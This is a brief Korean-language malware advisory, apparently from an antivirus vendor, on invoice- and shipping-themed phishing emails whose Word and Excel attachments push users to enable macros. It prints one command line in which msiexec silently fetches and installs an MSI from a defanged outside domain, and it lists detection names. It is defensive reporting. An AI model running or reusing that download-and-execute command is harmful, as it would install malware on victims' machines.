□ 개요
최근 국내에 송장 및 인보이스로 위장한 악성 메일이 지속적으로 유포되고 있어 국내 사용자들의 각별한 주의가
요구된다.
□ 내용
해당 메일에는 송장 또는 인보이스 관련 이름을 가진 .doc 파일 또는 .xls 파일이 첨부되어 있다.
메일에 첨부된 문서 파일을 실행하게 되면 ‘콘텐츠 사용’ 버튼을 클릭하라는 내용이 담겨있다. 사용자가 ‘콘텐츠 사용’버튼을 누르게 유도함으로써 문서 파일 내부에 존재하는 매크로 실행을 통해 악성코드를 감염시킨다.
사용자가 ‘콘텐츠 사용’ 버튼을 클릭하게 되면 내부에서 매크로가 실행됨으로써 msiexec.exe를 통해 악성 MSI 파일을 다운로드하고 실행하게 된다.
msiexec.exe val=conn rdp=pu,,,ic /i hxxp://update365office.com/agp /q
OnLoad='c:\windows\notepad.exe’ |
따라서, 최근 다양한 악성메일을 통해 감염을 시도하고 있으므로 첨부파일이 포함된 메일의 경우 의심부터 하고 메일의 진위여부를 주의 깊게 확인해야 한다.
□ 바이로봇 업데이트 내역
Trojan.Win32.Downloader
MSI.Agent
BIN.Agent
Backdoor.Win32.Agent